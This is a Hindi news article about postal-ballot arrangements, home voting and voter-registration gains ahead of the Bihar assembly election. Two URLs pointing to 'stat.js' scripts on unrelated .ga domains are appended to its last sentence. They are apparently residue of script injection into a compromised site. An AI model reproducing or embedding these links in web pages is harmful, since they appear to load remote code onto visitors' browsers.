बिहार में विधानसभा चुनाव की तैयारी जोर शोर से चल रही है और सभी कोई चुनाव को लेकर उत्साहित हैं, लेकिन कोरोना काल के चलते ज्यादा उम्र वालों के लिए खतरा बढ़ा हुआ है। इसी बात को ध्यान में रखते हुए चुनाव आयोग ने चुनाव में सभी की सहभागिता सुनिश्चित करने के लिए पोस्टल बैलट सुविधा प्रदान करने का निर्णय लिया है। लेकिन इस पोस्टल बैलट की सुविधा को केवल दिव्यांग, 80 वर्ष से अधिक उम्र के लोग और कोरोना संक्रमित व्यक्ति को ही उपलब्ध कराई जाएगी।

 

 

आपको बता दें, यह सुविधा केवल तभी उपलब्ध कराई जाएगी जब संबंधित मतदाता को पहले अवगत कराया जाएगा। इसके लिए फॉर्म भरना पड़ेगा जिसके बाद मतदाता को पोस्टल बैलट उपलब्ध कराया जाएगा। इसके लिए वोटर लिस्ट में चिन्हित भी किया जाएगा। उन्होंने कहा कि चुनाव कार्य में लगे कर्मियों की टीम चलंत मतदान के द्वारा उनके घर पर पहुंचकर पोस्टल बैलेट से उनका मतदान कराएंगे। साथ ही प्रत्येक विधानसभा क्षेत्र में एक मॉडल मतदान केंद्र भी बनाया जाएगा। जहां पर अन्य मतदान केंद्रों की तुलना में बेहतर रंग-रूप दिया जाएगा।

 

 

आपको बता दें, लोगो के अंदर इस बार चुनाव को लेकर काफी जागरूकता भी फैली हुई है। पिछले बार के लोकसभा चुनाव के दौरान मतदाता सूची के अनुसार लिंगानुपात 871 था। ज्ञात है, इससे प्रभावित होकर जिस पर महिला मतदाताओं के वोटर लिस्ट में निबंधन कराने को लेकर प्रशासन की ओर से विशेष अभियान चलाया गया। इसके बाद आज की तिथि में लिंगानुपात 899 है। जानकारी के मुताबिक्, अभियान के तहत इन छह विधानसभा क्षेत्र में 48,535 नए मतदाताओं की संख्या बढ़ी है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.